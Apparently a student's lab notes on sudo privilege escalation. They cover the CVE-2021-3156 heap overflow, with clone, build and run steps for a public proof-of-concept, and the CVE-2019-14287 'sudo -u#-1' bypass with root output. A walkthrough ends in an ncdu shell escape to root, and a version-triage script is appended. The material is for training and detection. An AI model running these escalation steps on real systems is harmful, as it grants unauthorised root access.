# Intro

- `sudo` (aka substitute user do) is used to start processes with the rights of another user
- The `/etc/sudoers` file specifies which users or groups are allowed to run specific programs, on which hosts, as which users and with what privileges; a rule has the shape `user host=(runas_user:runas_group) command`, and `sudo -l` prints the rules that apply to the current user (including those from drop-in files under `/etc/sudoers.d`)
- The command below strips comment lines and blank lines (the `sed` expression deletes lines that are empty or contain only whitespace) so that only the active rules remain. Note that `grep -v "#"` drops every line containing a `#`, so on older `sudo` versions it also hides the `#includedir /etc/sudoers.d` directive (spelled `@includedir` on the version shown here), which is a directive rather than a comment

```bash
sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
Defaults use_pty
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo ALL=(ALL:ALL) ALL
cry0l1t3 ALL=(ALL) /usr/bin/id
@includedir /etc/sudoers.d
```

# CVE-2021-3156

- `CVE-2021-3156` ("Baron Samedit") is a relatively recent `sudo` vuln based on a heap-based buffer overflow in the way `sudo` unescapes backslashes in command arguments when invoked as `sudoedit` or in shell mode (`-s`/`-i`); it is exploitable by any local user and needs no entry in `/etc/sudoers`
- Affected releases are legacy `1.8.2` through `1.8.31p2` and stable `1.9.0` through `1.9.5p1`; the default `sudo` builds of at least the following distributions are affected:
  - 1.8.31 - Ubuntu 20.04
  - 1.8.27 - Debian 10
  - 1.9.2 - Fedora 33
- Enumerate the `sudo` version with the command below

```bash
sudo -V | head -n1

Sudo version 1.8.31
```

- There is also a public [PoC](https://github.com/blasty/CVE-2021-3156) that can be used to exploit this CVE
- Below we clone the associated repo and build the binary

```bash
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
```

- Now run the newly built binary; without an argument it prints its list of supported targets, so pass the number of the entry matching the target's distribution and version

```bash
./sudo-hax-me-a-sandwich
```

- If we don't already know it, we can enumerate the target's OS with the commands below

```bash
cat /etc/lsb-release
cat /etc/os-release
```

# Sudo Policy Bypass

- [CVE-2019-14287](https://www.sudo.ws/security/advisories/minus_1_uid/) affects all versions below `1.8.28`
- This exploit requires a single prerequisite: a rule in `/etc/sudoers` that lets the user execute a specific command with a Runas list of `ALL`, such as the one below. The bypass matters when that Runas list excludes root, e.g. `(ALL, !root)`; a plain `(ALL)` entry already permits `sudo -u root`

```bash
sudo -l

User cry0l1t3 may run the following commands on Penny:
    ALL=(ALL) /usr/bin/id
```

- `sudo -u` accepts either a user name or, with a `#` prefix, a numeric UID, and the command is then executed as that UID
- Below we can enumerate the current user's UID (`id -u` prints it directly)

```bash
cat /etc/passwd | grep cry0l1t3
```

- However, if a negative ID (`-1`) is entered at `sudo`,
this results in the command running with UID `0`, which only `root` has: `-1` (and its unsigned form `4294967295`) is not a valid UID, so the `setresuid()` call leaves the UID at `sudo`'s own `0`, while the `!root` exclusion in the Runas list never matches because the requested user is not `root`

```bash
sudo -u#-1 id
root@nix02:/home/cry0l1t3# id
uid=0(root) gid=1005(cry0l1t3) groups=1005(cry0l1t3)
```

---

# Exercise

# Initial Enum

- `ping` test
![[images/Pasted image 20260213194547.png]]
- `nmap` scans
![[images/Pasted image 20260213194659.png]]
- `ssh` into target with given creds
- light internal enum on target
![[images/Pasted image 20260213194639.png]]

# sudo enum

- determine `sudo` version
![[images/Pasted image 20260213194722.png]]
- This version is vulnerable to `CVE-2021-3156`
- Because this version `1.8.21` is lower than version `1.8.28` and we can execute at least one specified command (i.e., `/bin/ncdu`), this machine is vulnerable to the `sudo` policy bypass
- determine OS
![[images/Pasted image 20260213194911.png]]
- determine current user's UID
![[images/Pasted image 20260213195000.png]]

## CVE-2021-3156

- `git clone` the `CVE-2021-3156` repo and build the associated binary
![[images/Pasted image 20260213195513.png]]
- now we have the `sudo-hax-me-a-sandwich` binary
![[images/Pasted image 20260213195558.png]]
- archive this dir
![[images/Pasted image 20260213195912.png]]
- serve up this dir from Kali and grab the archive from the target
![[images/Pasted image 20260213200235.png]]
![[images/Pasted image 20260213200215.png]]
- unarchive the tarball
- run exploit with focal fossa argument > glibc error
![[images/Pasted image 20260213200415.png]]
- we need to build the binary on the target because the target uses glibc version 2.31 and our Kali box has version 2.42
![[images/Pasted image 20260213200527.png]]
- start over: `sudo git clone https://github.com/blasty/CVE-2021-3156.git` and `cd CVE-2021-3156 && sudo tar -cvf cve.tar .`
- serve up the tarball and download on target
![[images/Pasted image 20260213200949.png]]
- unarchive the tarball and build the binary > `make` is not on target?
![[images/Pasted image 20260213201217.png]]

## sudo policy bypass

- run `/bin/ncdu` with `sudo` privs while specifying the `-1` UID; we see a menu associated with the current dir
![[images/Pasted image 20260213201550.png]]
- check out the `man` page for `ncdu`
![[images/Pasted image 20260213201653.png]]
- the `b` option for `ncdu` allows us to spawn a shell in the current directory
- try the above again and press `b` > root!
![[images/Pasted image 20260213201735.png]]
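The checks from the `CVE-2021-3156` and `Sudo Policy Bypass` sections above, gathered into one triage script. This is an added example and is not part of the original notes or of the blasty PoC. It assumes the first line of `sudo -V` has the form `Sudo version 1.8.31p2`, takes the affected ranges from the two advisories, uses the `sudoedit -s /` probe that Qualys published with the CVE-2021-3156 advisory, and runs against a constructed `sudo -l` transcript (`SAMPLE_SUDO_L`, a made-up name) rather than a live host; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original notes or of the blasty PoC.
# Assumptions: "sudo -V | head -n1" looks like "Sudo version 1.8.31p2";
# affected ranges come from the two advisories (CVE-2021-3156: 1.8.2 to
# 1.8.31p2 and 1.9.0 to 1.9.5p1; CVE-2019-14287: every release before
# 1.8.28); SAMPLE_SUDO_L is a constructed "sudo -l" transcript.

# Normalise "Sudo version 1.8.31p2", "1.8.31p2" or "1.8.31" into the
# integer MmmPPPpp (major, minor, patch, p-level) so that versions
# compare with -lt / -ge.  Example: 1.8.31p2 -> 10803102
sudo_ver_num() {
    v=$1
    case "$v" in "Sudo version "*) v=${v#"Sudo version "} ;; esac
    plevel=0
    case "$v" in *p*) plevel=${v##*p}; v=${v%%p*} ;; esac
    major=${v%%.*}
    rest=${v#*.}
    minor=${rest%%.*}
    case "$rest" in *.*) patch=${rest#*.} ;; *) patch=0 ;; esac
    printf '%d%02d%03d%02d\n' "$major" "$minor" "$patch" "$plevel"
}

# CVE-2021-3156 ("Baron Samedit"): heap overflow reachable by any local
# user through sudoedit / sudo -s / sudo -i, no sudoers entry required.
cve_2021_3156_affected() {
    n=$(sudo_ver_num "$1")
    if [ "$n" -ge "$(sudo_ver_num 1.8.2)" ] && [ "$n" -le "$(sudo_ver_num 1.8.31p2)" ]; then
        return 0
    fi
    if [ "$n" -ge "$(sudo_ver_num 1.9.0)" ] && [ "$n" -le "$(sudo_ver_num 1.9.5p1)" ]; then
        return 0
    fi
    return 1
}

# CVE-2019-14287 (minus_1_uid): fixed in 1.8.28.
cve_2019_14287_affected() {
    [ "$(sudo_ver_num "$1")" -lt "$(sudo_ver_num 1.8.28)" ]
}

# Non-destructive live probe published with the CVE-2021-3156 advisory:
# a vulnerable sudoedit accepts "-s" and complains about the path
# ("sudoedit: /: not a regular file"); a patched one rejects "-s" and
# prints its usage text.  Run this on the target as a normal user.
cve_2021_3156_probe() {
    out=$(sudoedit -s / 2>&1 </dev/null) || true
    case "$out" in
        sudoedit:*) echo "vulnerable" ;;
        usage:*)    echo "patched" ;;
        *)          echo "inconclusive: $out" ;;
    esac
}

# Constructed "sudo -l" transcript in the shape shown above (not from a
# real host).  The minus-one trick is needed for Runas lists that are ALL
# but exclude root, such as "(ALL, !root)"; a plain "(ALL)" entry already
# allows "sudo -u root <cmd>".
SAMPLE_SUDO_L='Matching Defaults entries for cry0l1t3 on nix02:
    env_reset, mail_badpass, secure_path=/usr/bin:/bin

User cry0l1t3 may run the following commands on nix02:
    (ALL, !root) /usr/bin/id
    (ALL) /usr/bin/vim
    (www-data) /usr/bin/less'

# Print one "sudo -u#-1 <cmd>" candidate for every rule whose Runas list
# starts with ALL; rules limited to another named user are skipped.
minus_one_candidates() {
    printf '%s\n' "$1" |
        sed -n 's/^[[:space:]]*(ALL[^)]*)[[:space:]]*\(.*\)$/sudo -u#-1 \1/p'
}

# Demo on constructed input; on a target feed in "$(sudo -V | head -n1)"
# and "$(sudo -l)" instead, and call cve_2021_3156_probe there.
for ver in "Sudo version 1.8.21p2" "Sudo version 1.8.31" "Sudo version 1.9.5p2"; do
    printf '%-22s CVE-2021-3156:%-3s CVE-2019-14287:%s\n' "$ver" \
        "$(cve_2021_3156_affected "$ver" && echo yes || echo no)" \
        "$(cve_2019_14287_affected "$ver" && echo yes || echo no)"
done
minus_one_candidates "$SAMPLE_SUDO_L"
```

The version comparison is deliberately numeric rather than a string match so that `1.8.31p2` sorts after `1.8.31` and before `1.9.0`; the `sudoedit -s /` probe is the only part that touches a live `sudo`, and it only asks `sudoedit` to parse options, so it is safe to run on a production host.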